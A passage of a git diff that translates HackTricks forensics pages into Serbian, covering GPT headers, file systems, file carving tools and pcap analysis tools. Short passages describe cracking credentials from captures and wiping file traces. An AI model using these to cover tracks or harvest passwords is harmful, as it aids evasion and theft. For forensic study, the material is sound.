+**Zaštitni MBR (LBA0)**:
 
-**Protective MBR (LBA0)**:
-
-- GPT maintains backward compatibility through a protective MBR. This feature resides in the legacy MBR space but is designed to prevent older MBR-based utilities from mistakenly overwriting GPT disks, hence safeguarding the data integrity on GPT-formatted disks.
+- GPT održava unazad kompatibilnost kroz zaštitni MBR. Ova funkcija se nalazi u prostoru nasleđenog MBR-a, ali je dizajnirana da spreči starije MBR-bazirane alate da greškom prepisuju GPT diskove, čime se štiti integritet podataka na GPT-formatiranim diskovima.
 
 ![https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/GUID_Partition_Table_Scheme.svg/800px-GUID_Partition_Table_Scheme.svg.png](<../../../images/image (1062).png>)
 
-**Hybrid MBR (LBA 0 + GPT)**
+**Hibridni MBR (LBA 0 + GPT)**
 
-[From Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table)
+[Sa Vikipedije](https://en.wikipedia.org/wiki/GUID_Partition_Table)
 
-In operating systems that support **GPT-based boot through BIOS** services rather than EFI, the first sector may also still be used to store the first stage of the **bootloader** code, but **modified** to recognize **GPT** **partitions**. The bootloader in the MBR must not assume a sector size of 512 bytes.
+U operativnim sistemima koji podržavaju **GPT-bazirano pokretanje putem BIOS** usluga umesto EFI, prvi sektor se takođe može koristiti za skladištenje prve faze **bootloader** koda, ali **modifikovan** da prepozna **GPT** **particije**. Bootloader u MBR-u ne sme da pretpostavlja veličinu sektora od 512 bajta.
 
-**Partition table header (LBA 1)**
+**Zaglavlje tabele particija (LBA 1)**
 
-[From Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table)
+[Sa Vikipedije](https://en.wikipedia.org/wiki/GUID_Partition_Table)
 
-The partition table header defines the usable blocks on the disk. It also defines the number and size of the partition entries that make up the partition table (offsets 80 and 84 in the table).
+Zaglavlje tabele particija definiše upotrebljive blokove na disku. Takođe definiše broj i veličinu unosa particija koji čine tabelu particija (offseti 80 i 84 u tabeli).
 
-| Offset    | Length   | Contents                                                                                                                                                                     |
+| Offset    | Dužina   | Sadržaj                                                                                                                                                                     |
 | --------- | -------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| 0 (0x00)  | 8 bytes  | Signature ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h or 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID_Partition_Table#cite_note-8)on little-endian machines) |
-| 8 (0x08)  | 4 bytes  | Revision 1.0 (00h 00h 01h 00h) for UEFI 2.8                                                                                                                                  |
-| 12 (0x0C) | 4 bytes  | Header size in little endian (in bytes, usually 5Ch 00h 00h 00h or 92 bytes)                                                                                                 |
-| 16 (0x10) | 4 bytes  | [CRC32](https://en.wikipedia.org/wiki/CRC32) of header (offset +0 up to header size) in little endian, with this field zeroed during calculation                             |
-| 20 (0x14) | 4 bytes  | Reserved; must be zero                                                                                                                                                       |
-| 24 (0x18) | 8 bytes  | Current LBA (location of this header copy)                                                                                                                                   |
-| 32 (0x20) | 8 bytes  | Backup LBA (location of the other header copy)                                                                                                                               |
-| 40 (0x28) | 8 bytes  | First usable LBA for partitions (primary partition table last LBA + 1)                                                                                                       |
-| 48 (0x30) | 8 bytes  | Last usable LBA (secondary partition table first LBA − 1)                                                                                                                    |
-| 56 (0x38) | 16 bytes | Disk GUID in mixed endian                                                                                                                                                    |
-| 72 (0x48) | 8 bytes  | Starting LBA of an array of partition entries (always 2 in primary copy)                                                                                                     |
-| 80 (0x50) | 4 bytes  | Number of partition entries in array                                                                                                                                         |
-| 84 (0x54) | 4 bytes  | Size of a single partition entry (usually 80h or 128)                                                                                                                        |
-| 88 (0x58) | 4 bytes  | CRC32 of partition entries array in little endian                                                                                                                            |
-| 92 (0x5C) | \*       | Reserved; must be zeroes for the rest of the block (420 bytes for a sector size of 512 bytes; but can be more with larger sector sizes)                                      |
+| 0 (0x00)  | 8 bajtova| Potpis ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h ili 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID_Partition_Table#cite_note-8) na little-endian mašinama) |
+| 8 (0x08)  | 4 bajta  | Revizija 1.0 (00h 00h 01h 00h) za UEFI 2.8                                                                                                                                  |
+| 12 (0x0C) | 4 bajta  | Veličina zaglavlja u little endian (u bajtovima, obično 5Ch 00h 00h 00h ili 92 bajta)                                                                                                 |
+| 16 (0x10) | 4 bajta  | [CRC32](https://en.wikipedia.org/wiki/CRC32) zaglavlja (offset +0 do veličine zaglavlja) u little endian, sa ovim poljem nula tokom izračunavanja                             |
+| 20 (0x14) | 4 bajta  | Rezervisano; mora biti nula                                                                                                                                                       |
+| 24 (0x18) | 8 bajtova| Trenutni LBA (lokacija ove kopije zaglavlja)                                                                                                                                   |
+| 32 (0x20) | 8 bajtova| Backup LBA (lokacija druge kopije zaglavlja)                                                                                                                               |
+| 40 (0x28) | 8 bajtova| Prvi upotrebljivi LBA za particije (poslednji LBA primarne tabele particija + 1)                                                                                                       |
+| 48 (0x30) | 8 bajtova| Poslednji upotrebljivi LBA (prvi LBA sekundarne tabele particija − 1)                                                                                                                    |
+| 56 (0x38) | 16 bajtova| Disk GUID u mešovitom endian                                                                                                                                                    |
+| 72 (0x48) | 8 bajtova| Početni LBA niza unosa particija (uvek 2 u primarnoj kopiji)                                                                                                     |
+| 80 (0x50) | 4 bajta  | Broj unosa particija u nizu                                                                                                                                         |
+| 84 (0x54) | 4 bajta  | Veličina jednog unosa particije (obično 80h ili 128)                                                                                                                        |
+| 88 (0x58) | 4 bajta  | CRC32 niza unosa particija u little endian                                                                                                                            |
+| 92 (0x5C) | \*       | Rezervisano; mora biti nule za ostatak bloka (420 bajtova za veličinu sektora od 512 bajta; ali može biti više sa većim veličinama sektora)                                      |
 
-**Partition entries (LBA 2–33)**
+**Unosi particija (LBA 2–33)**
 
-| GUID partition entry format |          |                                                                                                               |
+| Format unosa GUID particije |          |                                                                                                               |
 | --------------------------- | -------- | ------------------------------------------------------------------------------------------------------------- |
-| Offset                      | Length   | Contents                                                                                                      |
-| 0 (0x00)                    | 16 bytes | [Partition type GUID](https://en.wikipedia.org/wiki/GUID_Partition_Table#Partition_type_GUIDs) (mixed endian) |
-| 16 (0x10)                   | 16 bytes | Unique partition GUID (mixed endian)                                                                          |
-| 32 (0x20)                   | 8 bytes  | First LBA ([little endian](https://en.wikipedia.org/wiki/Little_endian))                                      |
-| 40 (0x28)                   | 8 bytes  | Last LBA (inclusive, usually odd)                                                                             |
-| 48 (0x30)                   | 8 bytes  | Attribute flags (e.g. bit 60 denotes read-only)                                                               |
-| 56 (0x38)                   | 72 bytes | Partition name (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE code units)                               |
+| Offset                      | Dužina   | Sadržaj                                                                                                      |
+| 0 (0x00)                    | 16 bajtova | [GUID tipa particije](https://en.wikipedia.org/wiki/GUID_Partition_Table#Partition_type_GUIDs) (mešovit endian) |
+| 16 (0x10)                   | 16 bajtova | Jedinstveni GUID particije (mešovit endian)                                                                          |
+| 32 (0x20)                   | 8 bajtova  | Prvi LBA ([little endian](https://en.wikipedia.org/wiki/Little_endian))                                      |
+| 40 (0x28)                   | 8 bajtova  | Poslednji LBA (uključivo, obično neparan)                                                                             |
+| 48 (0x30)                   | 8 bajtova  | Zastavice atributa (npr. bit 60 označava samo za čitanje)                                                               |
+| 56 (0x38)                   | 72 bajtova | Ime particije (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE kodnih jedinica)                               |
 
-**Partitions Types**
+**Tipovi particija**
 
 ![](<../../../images/image (83).png>)
 
-More partition types in [https://en.wikipedia.org/wiki/GUID_Partition_Table](https://en.wikipedia.org/wiki/GUID_Partition_Table)
+Više tipova particija na [https://en.wikipedia.org/wiki/GUID_Partition_Table](https://en.wikipedia.org/wiki/GUID_Partition_Table)
 
-### Inspecting
+### Istraživanje
 
-After mounting the forensics image with [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/), you can inspect the first sector using the Windows tool [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** In the following image an **MBR** was detected on the **sector 0** and interpreted:
+Nakon montiranja forenzičke slike sa [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/), možete ispitati prvi sektor koristeći Windows alat [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** Na sledećoj slici je otkriven **MBR** na **sektoru 0** i interpretiran:
 
 ![](<../../../images/image (354).png>)
 
-If it was a **GPT table instead of an MBR** it should appear the signature _EFI PART_ in the **sector 1** (which in the previous image is empty).
+Ako je to bila **GPT tabela umesto MBR-a**, trebala bi se pojaviti oznaka _EFI PART_ u **sektoru 1** (koji je na prethodnoj slici prazan).
 
-## File-Systems
+## Sistemi datoteka
 
-### Windows file-systems list
+### Lista Windows sistema datoteka
 
 - **FAT12/16**: MSDOS, WIN95/98/NT/200
 - **FAT32**: 95/2000/XP/2003/VISTA/7/8/10
@@ -151,49 +149,49 @@ If it was a **GPT table instead of an MBR** it should appear the signature _EFI
 
 ### FAT
 
-The **FAT (File Allocation Table)** file system is designed around its core component, the file allocation table, positioned at the volume's start. This system safeguards data by maintaining **two copies** of the table, ensuring data integrity even if one is corrupted. The table, along with the root folder, must be in a **fixed location**, crucial for the system's startup process.
+**FAT (Tabela alokacije datoteka)** sistem datoteka je dizajniran oko svoje osnovne komponente, tabele alokacije datoteka, koja se nalazi na početku volumena. Ovaj sistem štiti podatke održavanjem **dvije kopije** tabele, osiguravajući integritet podataka čak i ako je jedna oštećena. Tabela, zajedno sa korenskim folderom, mora biti na **fiksnoj lokaciji**, što je ključno za proces pokretanja sistema.
 
-The file system's basic unit of storage is a **cluster, usually 512B**, comprising multiple sectors. FAT has evolved through versions:
+Osnovna jedinica skladištenja sistema datoteka je **klaster, obično 512B**, koji se sastoji od više sektora. FAT se razvijao kroz verzije:
 
-- **FAT12**, supporting 12-bit cluster addresses and handling up to 4078 clusters (4084 with UNIX).
-- **FAT16**, enhancing to 16-bit addresses, thereby accommodating up to 65,517 clusters.
-- **FAT32**, further advancing with 32-bit addresses, allowing an impressive 268,435,456 clusters per volume.
+- **FAT12**, podržava 12-bitne adrese klastera i obrađuje do 4078 klastera (4084 sa UNIX-om).
+- **FAT16**, unapređuje na 16-bitne adrese, čime se omogućava do 65,517 klastera.
+- **FAT32**, dodatno napreduje sa 32-bitnim adresama, omogućavajući impresivnih 268,435,456 klastera po volumenu.
 
-A significant limitation across FAT versions is the **4GB maximum file size**, imposed by the 32-bit field used for file size storage.
+Značajno ograničenje kod FAT verzija je **maksimalna veličina datoteke od 4GB**, koju nameće 32-bitno polje korišćeno za skladištenje veličine datoteke.
 
-Key components of the root directory, particularly for FAT12 and FAT16, include:
+Ključne komponente korenskog direktorijuma, posebno za FAT12 i FAT16, uključuju:
 
-- **File/Folder Name** (up to 8 characters)
-- **Attributes**
-- **Creation, Modification, and Last Access Dates**
-- **FAT Table Address** (indicating the start cluster of the file)
-- **File Size**
+- **Ime datoteke/foldera** (do 8 karaktera)
+- **Atributi**
+- **Datumi kreiranja, modifikacije i poslednjeg pristupa**
+- **Adresa FAT tabele** (koja označava početni klaster datoteke)
+- **Veličina datoteke**
 
 ### EXT
 
-**Ext2** is the most common file system for **not journaling** partitions (**partitions that don't change much**) like the boot partition. **Ext3/4** are **journaling** and are used usually for the **rest partitions**.
+**Ext2** je najčešći sistem datoteka za **ne-journal** particije (**particije koje se ne menjaju mnogo**) kao što je particija za pokretanje. **Ext3/4** su **journal** i obično se koriste za **ostale particije**.
 
-## **Metadata**
+## **Metapodaci**
 
-Some files contain metadata. This information is about the content of the file which sometimes might be interesting to an analyst as depending on the file type, it might have information like:
+Neke datoteke sadrže metapodatke. Ove informacije se odnose na sadržaj datoteke koji ponekad može biti zanimljiv analitičaru jer, u zavisnosti od tipa datoteke, može sadržati informacije kao što su:
 
-- Title
-- MS Office Version used
-- Author
-- Dates of creation and last modification
-- Model of the camera
-- GPS coordinates
-- Image information
+- Naslov
+- Verzija MS Office-a koja se koristi
+- Autor
+- Datumi kreiranja i poslednje modifikacije
+- Model kamere
+- GPS koordinate
+- Informacije o slici
 
-You can use tools like [**exiftool**](https://exiftool.org) and [**Metadiver**](https://www.easymetadata.com/metadiver-2/) to get the metadata of a file.
+Možete koristiti alate kao što su [**exiftool**](https://exiftool.org) i [**Metadiver**](https://www.easymetadata.com/metadiver-2/) da dobijete metapodatke datoteke.
 
-## **Deleted Files Recovery**
+## **Oporavak obrisanih datoteka**
 
-### Logged Deleted Files
+### Zabeležene obrisane datoteke
 
-As was seen before there are several places where the file is still saved after it was "deleted". This is because usually the deletion of a file from a file system just marks it as deleted but the data isn't touched. Then, it's possible to inspect the registries of the files (like the MFT) and find the deleted files.
+Kao što je ranije viđeno, postoji nekoliko mesta gde je datoteka još uvek sačuvana nakon što je "obrisana". To je zato što obično brisanje datoteke iz sistema datoteka samo označava da je obrisana, ali podaci nisu dodirnuti. Tada je moguće ispitati registre datoteka (kao što je MFT) i pronaći obrisane datoteke.
 
-Also, the OS usually saves a lot of information about file system changes and backups, so it's possible to try to use them to recover the file or as much information as possible.
+Takođe, OS obično čuva mnogo informacija o promenama u sistemu datoteka i rezervnim kopijama, tako da je moguće pokušati da ih iskoristite za oporavak datoteke ili što više informacija.
 
 {{#ref}}
 file-data-carving-recovery-tools.md
@@ -201,11 +199,11 @@ file-data-carving-recovery-tools.md
 
 ### **File Carving**
 
-**File carving** is a technique that tries to **find files in the bulk of data**. There are 3 main ways tools like this work: **Based on file types headers and footers**, based on file types **structures** and based on the **content** itself.
+**File carving** je tehnika koja pokušava da **pronađe datoteke u masi podataka**. Postoje 3 glavna načina na koje alati poput ovog funkcionišu: **Na osnovu zaglavlja i podnožja tipova datoteka**, na osnovu **struktura** tipova datoteka i na osnovu **sadržaja** same datoteke.
 
-Note that this technique **doesn't work to retrieve fragmented files**. If a file **isn't stored in contiguous sectors**, then this technique won't be able to find it or at least part of it.
+Napomena da ova tehnika **ne funkcioniše za vraćanje fragmentisanih datoteka**. Ako datoteka **nije smeštena u kontiguitetne sektore**, tada ova tehnika neće moći da je pronađe ili barem deo nje.
 
-There are several tools that you can use for file Carving indicating the file types you want to search for
+Postoji nekoliko alata koje možete koristiti za file carving koji označavaju tipove datoteka koje želite da pretražujete.
 
 {{#ref}}
 file-data-carving-recovery-tools.md
@@ -213,24 +211,24 @@ file-data-carving-recovery-tools.md
 
 ### Data Stream **C**arving
 
-Data Stream Carving is similar to File Carving but **instead of looking for complete files, it looks for interesting fragments** of information.\
-For example, instead of looking for a complete file containing logged URLs, this technique will search for URLs.
+Data Stream Carving je sličan File Carving-u, ali **umesto da traži kompletne datoteke, traži zanimljive fragmente** informacija.\
+Na primer, umesto da traži kompletnu datoteku koja sadrži zabeležene URL-ove, ova tehnika će tražiti URL-ove.
 
 {{#ref}}
 file-data-carving-recovery-tools.md
 {{#endref}}
 
-### Secure Deletion
+### Sigurno brisanje
 
-Obviously, there are ways to **"securely" delete files and part of logs about them**. For example, it's possible to **overwrite the content** of a file with junk data several times, and then **remove** the **logs** from the **$MFT** and **$LOGFILE** about the file, and **remove the Volume Shadow Copies**.\
-You may notice that even performing that action there might be **other parts where the existence of the file is still logged**, and that's true and part of the forensics professional job is to find them.
+Očigledno, postoje načini da se **"sigurno" obrišu datoteke i deo logova o njima**. Na primer, moguće je **prepisati sadržaj** datoteke sa smešnim podacima nekoliko puta, a zatim **ukloniti** **logove** iz **$MFT** i **$LOGFILE** o datoteci, i **ukloniti kopije senki volumena**.\
+Možda ćete primetiti da čak i obavljanjem te akcije može postojati **drugi delovi gde je postojanje datoteke još uvek zabeleženo**, i to je tačno, a deo posla forenzičkog stručnjaka je da ih pronađe.
 
-## References
+## Reference
 
 - [https://en.wikipedia.org/wiki/GUID_Partition_Table](https://en.wikipedia.org/wiki/GUID_Partition_Table)
 - [http://ntfs.com/ntfs-permissions.htm](http://ntfs.com/ntfs-permissions.htm)
 - [https://www.osforensics.com/faqs-and-tutorials/how-to-scan-ntfs-i30-entries-deleted-files.html](https://www.osforensics.com/faqs-and-tutorials/how-to-scan-ntfs-i30-entries-deleted-files.html)
 - [https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service](https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service)
-- **iHackLabs Certified Digital Forensics Windows**
+- **iHackLabs Sertifikovani Digitalni Forenzik Windows**
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
index 1920c497a..edf53bdbc 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
@@ -2,94 +2,86 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Carving & Recovery tools
+## Alati za carving i oporavak
 
-More tools in [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery)
+Više alata na [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery)
 
 ### Autopsy
 
-The most common tool used in forensics to extract files from images is [**Autopsy**](https://www.autopsy.com/download/). Download it, install it and make it ingest the file to find "hidden" files. Note that Autopsy is built to support disk images and other kinds of images, but not simple files.
+Najčešće korišćen alat u forenzici za ekstrakciju fajlova iz slika je [**Autopsy**](https://www.autopsy.com/download/). Preuzmite ga, instalirajte i omogućite mu da unese fajl kako bi pronašao "sakrivene" fajlove. Imajte na umu da je Autopsy napravljen da podržava disk slike i druge vrste slika, ali ne i jednostavne fajlove.
 
 ### Binwalk 
 
-**Binwalk** is a tool for analyzing binary files to find embedded content. It's installable via `apt` and its source is on [GitHub](https://github.com/ReFirmLabs/binwalk).
-
-**Useful commands**:
+**Binwalk** je alat za analizu binarnih fajlova radi pronalaženja ugrađenog sadržaja. Može se instalirati putem `apt`, a njegov izvor je na [GitHub](https://github.com/ReFirmLabs/binwalk).
 
+**Korisne komande**:
 ```bash
 sudo apt install binwalk #Insllation
 binwalk file #Displays the embedded data in the given file
 binwalk -e file #Displays and extracts some files from the given file
 binwalk --dd ".*" file #Displays and extracts all files from the given file
 ```
-
 ### Foremost
 
-Another common tool to find hidden files is **foremost**. You can find the configuration file of foremost in `/etc/foremost.conf`. If you just want to search for some specific files uncomment them. If you don't uncomment anything foremost will search for its default configured file types.
-
+Još jedan uobičajen alat za pronalaženje skrivenih fajlova je **foremost**. Možete pronaći konfiguracioni fajl foremost-a u `/etc/foremost.conf`. Ako želite da pretražujete samo neke specifične fajlove, otkomentarišite ih. Ako ne otkomentarišete ništa, foremost će pretraživati svoje podrazumevane konfiguracione tipove fajlova.
 ```bash
 sudo apt-get install foremost
 foremost -v -i file.img -o output
 #Discovered files will appear inside the folder "output"
 ```
-
 ### **Scalpel**
 
-**Scalpel** is another tool that can be used to find and extract **files embedded in a file**. In this case, you will need to uncomment from the configuration file (_/etc/scalpel/scalpel.conf_) the file types you want it to extract.
-
+**Scalpel** je još jedan alat koji se može koristiti za pronalaženje i ekstrakciju **datoteka ugrađenih u datoteku**. U ovom slučaju, potrebno je da odkomentarišete tipove datoteka iz konfiguracione datoteke (_/etc/scalpel/scalpel.conf_) koje želite da ekstraktujete.
 ```bash
 sudo apt-get install scalpel
 scalpel file.img -o output
 ```
-
 ### Bulk Extractor
 
-This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk_extractor](https://github.com/simsong/bulk_extractor)
-
-This tool can scan an image and will **extract pcaps** inside it, **network information (URLs, domains, IPs, MACs, mails)** and more **files**. You only have to do:
+Ovaj alat dolazi unutar kali, ali ga možete pronaći ovde: [https://github.com/simsong/bulk_extractor](https://github.com/simsong/bulk_extractor)
 
+Ovaj alat može skenirati sliku i **izvući pcaps** unutar nje, **mrežne informacije (URL-ovi, domene, IP adrese, MAC adrese, e-mailovi)** i još **datoteka**. Samo treba da uradite:
 ```
 bulk_extractor memory.img -o out_folder
 ```
-
-Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/)), search for **weird domains** (domains related to **malware** or **non-existent**).
+Navigirajte kroz **sve informacije** koje je alat prikupio (lozinke?), **analizirajte** **pakete** (pročitajte [**analizu Pcaps**](../pcap-inspection/)), pretražujte **čudne domene** (domene povezane sa **malverom** ili **nepostojećim**).
 
 ### PhotoRec
 
-You can find it in [https://www.cgsecurity.org/wiki/TestDisk_Download](https://www.cgsecurity.org/wiki/TestDisk_Download)
+Možete ga pronaći na [https://www.cgsecurity.org/wiki/TestDisk_Download](https://www.cgsecurity.org/wiki/TestDisk_Download)
 
-It comes with GUI and CLI versions. You can select the **file-types** you want PhotoRec to search for.
+Dolazi sa GUI i CLI verzijama. Možete odabrati **tipove fajlova** koje želite da PhotoRec pretražuje.
 
 ![](<../../../images/image (242).png>)
 
 ### binvis
 
-Check the [code](https://code.google.com/archive/p/binvis/) and the [web page tool](https://binvis.io/#/).
+Proverite [kod](https://code.google.com/archive/p/binvis/) i [web stranicu alata](https://binvis.io/#/).
 
-#### Features of BinVis
+#### Karakteristike BinVis
 
-- Visual and active **structure viewer**
-- Multiple plots for different focus points
-- Focusing on portions of a sample
-- **Seeing stings and resources**, in PE or ELF executables e. g.
-- Getting **patterns** for cryptanalysis on files
-- **Spotting** packer or encoder algorithms
-- **Identify** Steganography by patterns
-- **Visual** binary-diffing
+- Vizuelni i aktivni **pregledač strukture**
+- Više grafova za različite tačke fokusa
+- Fokusiranje na delove uzorka
+- **Prikazivanje stringova i resursa**, u PE ili ELF izvršnim datotekama npr.
+- Dobijanje **šablona** za kriptoanalizu na fajlovima
+- **Prepoznavanje** pakera ili enkodera
+- **Identifikacija** steganografije po šablonima
+- **Vizuelno** binarno upoređivanje
 
-BinVis is a great **start-point to get familiar with an unknown target** in a black-boxing scenario.
+BinVis je odlična **polazna tačka za upoznavanje sa nepoznatim ciljem** u scenariju crne kutije.
 
-## Specific Data Carving Tools
+## Specifični alati za vađenje podataka
 
 ### FindAES
 
-Searches for AES keys by searching for their key schedules. Able to find 128. 192, and 256 bit keys, such as those used by TrueCrypt and BitLocker.
+Pretražuje AES ključeve tražeći njihove rasporede ključeva. Sposoban je da pronađe 128, 192 i 256 bitne ključeve, kao što su oni koje koriste TrueCrypt i BitLocker.
 
-Download [here](https://sourceforge.net/projects/findaes/).
+Preuzmite [ovde](https://sourceforge.net/projects/findaes/).
 
-## Complementary tools
+## Komplementarni alati
 
-You can use [**viu** ](https://github.com/atanunq/viu)to see images from the terminal.\
-You can use the linux command line tool **pdftotext** to transform a pdf into text and read it.
+Možete koristiti [**viu**](https://github.com/atanunq/viu) da vidite slike iz terminala.\
+Možete koristiti linux komandnu liniju **pdftotext** da transformišete pdf u tekst i pročitate ga.
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md
index c16bee711..3c2c5e921 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md
@@ -1,33 +1,27 @@
-# Pcap Inspection
+# Pcap Inspekcija
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-

-
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
-
 > [!NOTE]
-> A note about **PCAP** vs **PCAPNG**: there are two versions of the PCAP file format; **PCAPNG is newer and not supported by all tools**. You may need to convert a file from PCAPNG to PCAP using Wireshark or another compatible tool, in order to work with it in some other tools.
+> Napomena o **PCAP** vs **PCAPNG**: postoje dve verzije PCAP formata datoteka; **PCAPNG je noviji i nije podržan od svih alata**. Možda ćete morati da konvertujete datoteku iz PCAPNG u PCAP koristeći Wireshark ili neki drugi kompatibilni alat, kako biste mogli da radite s njom u nekim drugim alatima.
 
-## Online tools for pcaps
+## Online alati za pcaps
 
-- If the header of your pcap is **broken** you should try to **fix** it using: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
-- Extract **information** and search for **malware** inside a pcap in [**PacketTotal**](https://packettotal.com)
-- Search for **malicious activity** using [**www.virustotal.com**](https://www.virustotal.com) and [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com)
-- **Full pcap analysis from the browser in** [**https://apackets.com/**](https://apackets.com/)
+- Ako je zaglavlje vašeg pcap-a **pokvareno**, trebali biste pokušati da ga **popravite** koristeći: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
+- Ekstrahujte **informacije** i tražite **malver** unutar pcap-a u [**PacketTotal**](https://packettotal.com)
+- Tražite **malicioznu aktivnost** koristeći [**www.virustotal.com**](https://www.virustotal.com) i [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com)
+- **Potpuna pcap analiza iz pregledača u** [**https://apackets.com/**](https://apackets.com/)
 
-## Extract Information
+## Ekstrahovanje informacija
 
-The following tools are useful to extract statistics, files, etc.
+Sledeći alati su korisni za ekstrakciju statistike, datoteka itd.
 
 ### Wireshark
 
 > [!NOTE]
-> **If you are going to analyze a PCAP you basically must to know how to use Wireshark**
+> **Ako planirate da analizirate PCAP, osnovno je da znate kako da koristite Wireshark**
 
-You can find some Wireshark tricks in:
+Možete pronaći neke Wireshark trikove u:
 
 {{#ref}}
 wireshark-tricks.md
@@ -35,115 +29,97 @@ wireshark-tricks.md
 
 ### [**https://apackets.com/**](https://apackets.com/)
 
-Pcap analysis from the browser.
+Pcap analiza iz pregledača.
 
 ### Xplico Framework
 
-[**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico, extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on.
-
-**Install**
+[**Xplico** ](https://github.com/xplico/xplico)_(samo linux)_ može **analizirati** **pcap** i ekstrahovati informacije iz njega. Na primer, iz pcap datoteke Xplico ekstrahuje svaku email poruku (POP, IMAP i SMTP protokoli), sav HTTP sadržaj, svaki VoIP poziv (SIP), FTP, TFTP, i tako dalje.
 
+**Instalirajte**
 ```bash
 sudo bash -c 'echo "deb http://repo.xplico.org/ $(lsb_release -s -c) main" /etc/apt/sources.list'
 sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 791C25CE
 sudo apt-get update
 sudo apt-get install xplico
 ```
-
-**Run**
-
+**Pokreni**
 ```
 /etc/init.d/apache2 restart
 /etc/init.d/xplico start
 ```
+Pristupite _**127.0.0.1:9876**_ sa kredencijalima _**xplico:xplico**_
 
-Access to _**127.0.0.1:9876**_ with credentials _**xplico:xplico**_
-
-Then create a **new case**, create a **new session** inside the case and **upload the pcap** file.
+Zatim kreirajte **novi slučaj**, kreirajte **novu sesiju** unutar slučaja i **otpremite pcap** datoteku.
 
 ### NetworkMiner
 
-Like Xplico it is a tool to **analyze and extract objects from pcaps**. It has a free edition that you can **download** [**here**](https://www.netresec.com/?page=NetworkMiner). It works with **Windows**.\
-This tool is also useful to get **other information analysed** from the packets in order to be able to know what was happening in a **quicker** way.
+Poput Xplico, to je alat za **analizu i ekstrakciju objekata iz pcaps**. Ima besplatnu verziju koju možete **preuzeti** [**ovde**](https://www.netresec.com/?page=NetworkMiner). Radi sa **Windows**.\
+Ovaj alat je takođe koristan za dobijanje **druge analizirane informacije** iz paketa kako biste mogli brže saznati šta se dešava.
 
 ### NetWitness Investigator
 
-You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(It works in Windows)**.\
-This is another useful tool that **analyses the packets** and sorts the information in a useful way to **know what is happening inside**.
+Možete preuzeti [**NetWitness Investigator odavde**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(Radi na Windows)**.\
+Ovo je još jedan koristan alat koji **analizira pakete** i sortira informacije na koristan način da **znate šta se dešava unutra**.
 
 ### [BruteShark](https://github.com/odedshimon/BruteShark)
 
-- Extracting and encoding usernames and passwords (HTTP, FTP, Telnet, IMAP, SMTP...)
-- Extract authentication hashes and crack them using Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
-- Build a visual network diagram (Network nodes & users)
-- Extract DNS queries
-- Reconstruct all TCP & UDP Sessions
+- Ekstrakcija i kodiranje korisničkih imena i lozinki (HTTP, FTP, Telnet, IMAP, SMTP...)
+- Ekstrakcija autentifikacionih hash-ova i njihovo razbijanje pomoću Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
+- Izrada vizuelnog dijagrama mreže (Mrežni čvorovi i korisnici)
+- Ekstrakcija DNS upita
+- Rekonstrukcija svih TCP i UDP sesija
 - File Carving
 
 ### Capinfos
-
 ```
 capinfos capture.pcap
 ```
-
 ### Ngrep
 
-If you are **looking** for **something** inside the pcap you can use **ngrep**. Here is an example using the main filters:
-
+Ako **tražite** **nešto** unutar pcap-a, možete koristiti **ngrep**. Evo primera koji koristi glavne filtre:
 ```bash
 ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168"
 ```
+### Isecanje
 
-### Carving
-
-Using common carving techniques can be useful to extract files and information from the pcap:
